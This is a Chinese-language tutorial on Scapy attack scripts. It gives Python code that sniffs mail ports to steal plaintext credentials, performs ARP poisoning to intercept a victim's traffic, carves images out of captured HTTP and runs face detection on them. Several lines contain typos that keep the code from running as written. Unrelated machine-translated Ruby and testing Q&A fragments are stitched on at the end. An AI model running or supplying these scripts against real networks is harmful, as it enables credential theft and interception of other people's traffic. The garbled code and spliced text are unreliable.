Scapy 是一个用来解析底层网络数据包的Python模块和交互式程序,该程序对底层包处理进行了抽象打包,使得对网络数据包的处理非常简便。该类库可以在在网络安全领域有非常广泛用例,可用于漏洞利用开发、数据泄露、网络监听、入侵检测和流量的分析捕获的。Scapy与数据可视化和报告生成集成,可以方便展示起结果和数据。
我们会先简单尝试一下,用Scapy嗅探流量,从中窃取明文的邮箱身份凭证。然后对网络中的攻击目标进行ARP投毒,以此嗅探它们的网络流量。最后,我们会演示如何借助Scapy的pcap数据处理能力,从嗅探到的HTTP流量中提取图片,并运用面部识别算法来判断其是否为人像照片。
窃取邮箱身份凭证:
Scapy提供了一个名字简明扼要的接口函数sniff,它的定义是这样的:
sniff(filter = " ", iface = "any", prn = function, count = N)
filter参数允许你指定一个Berkeley数据包过滤器(Berkeley Packet Filter,BPF),用于过滤Scapy嗅探到的数据包,也可以将此参数留空,表示要嗅探所有的数据包。
iface参数用于指定嗅探器要嗅探的网卡,如果不设置的话,默认会嗅探所有网卡。prn参数用于指定一个回调函数,每当遇到符合过滤条件的数据包时,嗅探器就会将该数据包传给这个回调函数,这是该函数接受的唯一参数。count参数可以用来指定你想嗅探多少包,如果留空的话,Scapy就会一直嗅探下去。
mail_sniffer.py:
from scapy.all import sniff
def packet_callback(packet):
print(packet.show())
def main():
sniff(pro=packet_callback, count=1)
if __name__ == '__main__':
main()
在这个简单的嗅探器中,它只会嗅探邮箱协议相关的命令。
接下来我们将添加过滤器和回调函数代码,有针对性地捕获和邮箱账号认证相关的数据。
首先,我们将设置一个包过滤器,确保嗅探器只展示我们感兴趣的包。我们会使用BPF语法(也被称为Wireshark风格的语法)来编写过滤器。你可能会在tcpdump、Wireshark等工具中用到这种语法。先来讲一下基本的BPF语法。在BPF语法中,可以使用三种类型的信息:描述词(比如一个具体的主机地址、网卡名称或端口号)、数据流方向和通信协议,如图所示。你可以根据自己想找的数据,自由地添加或省略某个类型、方向或协议。

我们先写一个BPF:
from scapy.all import sniff, TCP, IP
#the packet callback
def packet_callback(packet):
if packet[TCP].payload:
mypacket = str(packet[TCP].paylaod)
if 'user' in mypacket.lower() or 'pass' in mypacket.lower():
print(f"[*] Destination: {packet[IP].dst}")
print(f"[*] {str(packet[TCP].payload)}")
def main():
#fire up the sniffer
sniff(filter='tcp port 110 or tcp port 25 or tcp port 143',prn=packet_callback, store=0)
#监听邮件协议常用端口
#新参数store,把它设为0以后,Scapy就不会将任何数据包保留在内存里
if __name__ == '__main__':
main()
ARP投毒攻击:
逻辑:欺骗目标设备,使其相信我们是它的网关;然后欺骗网关,告诉它要发给目标设备的所有流量必须交给我们转发。网络上的每一台设备,都维护着一段ARP缓存,里面记录着最近一段时间本地网络上的MAC地址和IP地址的对应关系。为了实现这一攻击,我们会往这些ARP缓存中投毒,即在缓存中插入我们编造的记录。
注意实验的目标机为mac
arper.py:
from multiprocessing import Process
from scapy.all import (ARP, Ether, conf, get_if_hwaddr, send, sniff, sndrcv, srp, wrpcap)
import os
import sys
import time
def get_mac(targetip):
packet = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op="who-has", pdst=targetip)
resp, _= srp(packet, timeout=2, retry=10, verbose=False)
for _, r in resp:
return r[Ether].src
return None
class Arper:
def __init__(self, victim, gateway, interface='en0'):
self.victim = victim
self.victimmac = get_mac(victim)
self.gateway = gateway
self.gatewaymac = get_mac(gateway)
self.interface = interface
conf.iface = interface
conf.verb = 0
print(f'Initialized {interface}:')
print(f'Gateway ({gateway}) is at {self.gateway}')
print(f'Victim ({victim}) is at {self.gatewaymac}')
print('_'*30)
def run(self):
self.poison_thread = Process(target=self.poison)
self.poison_thread.start()
self.sniff_thread = Process(target=self.sniff)
self.sniff_thread.start()
def poison(self):
poison_victim = ARP()
poison_victim.op = 2
poison_victim.psrc = self.gateway
poison_victim.pdst = self.victim
poison_victim.hwdst = self.victimmac
print(f'ip src: {poison_victim.psrc}')
print(f'ip dst: {poison_victim.pdst}')
print(f'mac dst: {poison_victim.hwdst}')
print(f'mac src: {poison_victim.hwsrc}')
print(poison_victim.summary())
print('_'*30)
poison_gateway = ARP()
poison_gateway.op = 2
poison_gateway.psrc = self,victim
poison_gateway.pdst = self.gateway
poison_gateway.hwdst = self.gatewaymac
print(f'ip src: {poison_gateway.psrc}')
print(f'ip dst: {poison_gateway.pdst}')
print(f'mac dst: {poison_gateway.hwdst}')
print(f'mac_src: {poison_gateway.hwsrc}')
print(poison_gateway.summary())
print('_'*30)
print(f'Beginning the ARP poison. [CTRL -C to stop]')
while True:
sys.stdout.write('.')
sys.stdout.flush()
try:
send(poison_victim)
send(poison_gateway)
except KeyboardInterrupt:
self.restore()
sys.exit()
else:
time.sleep(2)
def sniff(self, count=200):
time.sleep(5)
print(f'Sniffing {count} packets')
bpf_filter = "ip host %s" % victim
packets = sniff(count=count, filter=bpf_filter, ifcae=self.interface)
wrpcap('arper.pcap', packets)
print('Got the packets')
self.restore()
self.poison_thread.terminate()
print('Finished')
def restore(self):
print('Restoring ARP tables...')
send(ARP(
op=2,
psrc=self.gateway,
hwsrc=self.gatewaymac,
pdst=self.victim,
hwdst='ff:ff:ff:ff:ff:ff'),
count=5)
send(ARP(
op=2,
psrc=self.victim,
hwsrc=self.victimmac,
pdst=self.gateway,
hwdst='ff:ff:ff:ff:ff:ff'),
count=5)
if __name__ == '__main__':
(victim, gateway, interface) = (sys.argv[1], sys.argv[2], sys.argv[3])
myarp = Arper(victim, gateway, interface)
myarp.run()
pcap文件处理:
recapper.py:
from scapy.all import TCP, rdpcap
import collections
import os
import re
import sys
import zlib
OUTDIR = '/root/Desktop/pictures'
PCAPS = '/root/Downloads'
Response = collections.namedtuple('Response', ['header','payload'])
def get_header(payload):
try:
header_raw = payload[:payload.index(b'\r\n\r\n')+2]
except ValueError:
sys.stdout.write('_')
sys.stdout.flush()
return None
header = dict(re.findall(r'?P<name>.*?): (?P<value>.*?)\r\n', header_raw.decode()))
if 'Content-Type' not in header:
return None
return header
def extract_content(Response, content_name='image'):
content, content_type = None, None
if content_name in Response.header['Content-Type']:
content_type = Response.header['Content-Type'].split('/')[1]
content = Response.payload[Response.payload.index(b'\r\n\r\n')+4:]
if 'Content-Encoding' in Response.header:
if Response.header['Content-Encoding'] == "gzip":
content = zlib.decompress(Response.payload, zlib.MAX_wbits | 32)
elif Response.header['Content-Encoding'] == "deflate":
content = zlib.decompress(Response.payload)
return content, content_type
class Recapper:
def __init__(self, fname):
pcap = rdpcap(fname)
self.session = pcap.session()
self.responses = list()
def get_responses(self):
for session in self.session:
payload = b''
for packet in self.session[session]:
try:
if packet[TCP].dport == 80 or packet[TCP].sport == 80:
payload += bytes(packet[TCP].payload)
except IndexError:
sys.stdout.write('x')
sys.stdout.flush()
if payload:
header = get_header(payload)
if header is None:
continue
self.responses.append(Response(header=header, payload=payload))
def write(self, content_name):
for i, response in enumerate(self.responses):
content, content_type = extract_content(response, content_name)
if content and content_type:
fname = os.path.join(OUTDIR, f'ex_{i}.{content_type}')
print(f'Writing {fname}')
with open(fname, 'wb') as f:
f.write(content)
if __name__ == '__main__':
pfile = os.path.join(PCAPS, 'pcap.pcap')
recapper = Recapper(pfile)
recapper.get_responses()
recapper.write('image')
如果我们得到了一张图片,那么我们就要对这张图片进行分析,检查每张图片来确认里面是否存在人脸。对每张含有人脸的图片,我们会在人脸周围画一个方框,然后另存为一张新图片。
detector.py:
import cv2
import os
ROOT = '/root/Desktop/pictures'
FACES = '/root/Desktop/faces'
TRAIN = '/root/Desktop/training'
def detect(srcdir=ROOT, tgtdir=FACES, train_dir=TRAIN):
for fname in os.listdir(srcdir):
if not fname.upper().endswith('.JPG'):
continue
fullname = os.path.join(srcdir, fname)
newname = os.path.join(tgtdir, fname)
img = cv2.imread(fullname)
if img is None:
continue
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
training = os.path.join(train_dir, 'haarcascade_frontalface_alt.xml')
cascade = cv2.CascadeClassifier(training)
rects = cascade.detectMultiScale(gray, 1.3,5)
try:
if rects.any():
print('Got a face')
rects[:, 2:] += rects[:, :2]
except AttributeError:
print(f'No faces fount in {fname}')
continue
# highlight the faces in the image
for x1, y1, x2, y2 in rects:
cv2.rectangle(img, (x1, y1), (x2, y2), (127, 255, 0), 2)
cv2.imwrite(newname, img)
if name == '__main__':
detect()
到这里,我们的实验目标已经完成。对于其中的脚本我们可以扩展更多的内容,请大家自行发挥。
很好奇,就使用rubyonrails自动化单元测试而言,你们正在做什么?您是否创建了一个脚本来在cron中运行rake作业并将结果邮寄给您?git中的预提交Hook?只是手动调用?我完全理解测试,但想知道在错误发生之前捕获错误的最佳实践是什么。让我们理所当然地认为测试本身是完美无缺的,并且可以正常工作。下一步是什么以确保他们在正确的时间将可能有害的结果传达给您? 最佳答案 不确定您到底想听什么,但是有几个级别的自动代码库控制:在处理某项功能时,您可以使用类似autotest的内容获得关于哪些有效,哪些无效的即时反馈。要确保您的提
关闭。这个问题是opinion-based.它目前不接受答案。想要改进这个问题?更新问题,以便editingthispost可以用事实和引用来回答它.关闭4年前。Improvethisquestion我想在固定时间创建一系列低音和高音调的哔哔声。例如:在150毫秒时发出高音调的蜂鸣声在151毫秒时发出低音调的蜂鸣声200毫秒时发出低音调的蜂鸣声250毫秒的高音调蜂鸣声有没有办法在Ruby或Python中做到这一点?我真的不在乎输出编码是什么(.wav、.mp3、.ogg等等),但我确实想创建一个输出文件。
我正在编写一个包含C扩展的gem。通常当我写一个gem时,我会遵循TDD的过程,我会写一个失败的规范,然后处理代码直到它通过,等等......在“ext/mygem/mygem.c”中我的C扩展和在gemspec的“扩展”中配置的有效extconf.rb,如何运行我的规范并仍然加载我的C扩展?当我更改C代码时,我需要采取哪些步骤来重新编译代码?这可能是个愚蠢的问题,但是从我的gem的开发源代码树中输入“bundleinstall”不会构建任何native扩展。当我手动运行rubyext/mygem/extconf.rb时,我确实得到了一个Makefile(在整个项目的根目录中),然后当
我有一个围绕一些对象的包装类,我想将这些对象用作散列中的键。包装对象和解包装对象应映射到相同的键。一个简单的例子是这样的:classAattr_reader:xdefinitialize(inner)@inner=innerenddefx;@inner.x;enddef==(other)@inner.x==other.xendenda=A.new(o)#oisjustanyobjectthatallowso.xb=A.new(o)h={a=>5}ph[a]#5ph[b]#nil,shouldbe5ph[o]#nil,shouldbe5我试过==、===、eq?并散列所有无济于事。
我有一些Ruby代码,如下所示:Something.createdo|x|x.foo=barend我想编写一个测试,它使用double代替block参数x,这样我就可以调用:x_double.should_receive(:foo).with("whatever").这可能吗? 最佳答案 specify'something'dox=doublex.should_receive(:foo=).with("whatever")Something.should_receive(:create).and_yield(x)#callthere
Sinatra新手;我正在运行一些rspec测试,但在日志中收到了一堆不需要的噪音。如何消除日志中过多的噪音?我仔细检查了环境是否设置为:test,这意味着记录器级别应设置为WARN而不是DEBUG。spec_helper:require"./app"require"sinatra"require"rspec"require"rack/test"require"database_cleaner"require"factory_girl"set:environment,:testFactoryGirl.definition_file_paths=%w{./factories./test/
我遵循MichaelHartl的“RubyonRails教程:学习Web开发”,并创建了检查用户名和电子邮件长度有效性的测试(名称最多50个字符,电子邮件最多255个字符)。test/helpers/application_helper_test.rb的内容是:require'test_helper'classApplicationHelperTest在运行bundleexecraketest时,所有测试都通过了,但我看到以下消息在最后被标记为错误:ERROR["test_full_title_helper",ApplicationHelperTest,1.820016791]test
我已经构建了一些serverspec代码来在多个主机上运行一组测试。问题是当任何测试失败时,测试会在当前主机停止。即使测试失败,我也希望它继续在所有主机上运行。Rakefile:namespace:specdotask:all=>hosts.map{|h|'spec:'+h.split('.')[0]}hosts.eachdo|host|begindesc"Runserverspecto#{host}"RSpec::Core::RakeTask.new(host)do|t|ENV['TARGET_HOST']=hostt.pattern="spec/cfengine3/*_spec.r
我在app/helpers/sessions_helper.rb中有一个帮助程序文件,其中包含一个方法my_preference,它返回当前登录用户的首选项。我想在集成测试中访问该方法。例如,这样我就可以在测试中使用getuser_path(my_preference)。在其他帖子中,我读到这可以通过在测试文件中包含requiresessions_helper来实现,但我仍然收到错误NameError:undefinedlocalvariableormethod'my_preference'.我做错了什么?require'test_helper'require'sessions_hel
只是想确保我理解了事情。据我目前收集到的信息,Cucumber只是一个“包装器”,或者是一种通过将事物分类为功能和步骤来组织测试的好方法,其中实际的单元测试处于步骤阶段。它允许您根据事物的工作方式组织您的测试。对吗? 最佳答案 有点。它是一种组织测试的方式,但不仅如此。它的行为就像最初的Rails集成测试一样,但更易于使用。这里最大的好处是您的session在整个Scenario中保持透明。关于Cucumber的另一件事是您(应该)从使用您的代码的浏览器或客户端的角度进行测试。如果您愿意,您可以使用步骤来构建对象和设置状态,但通常您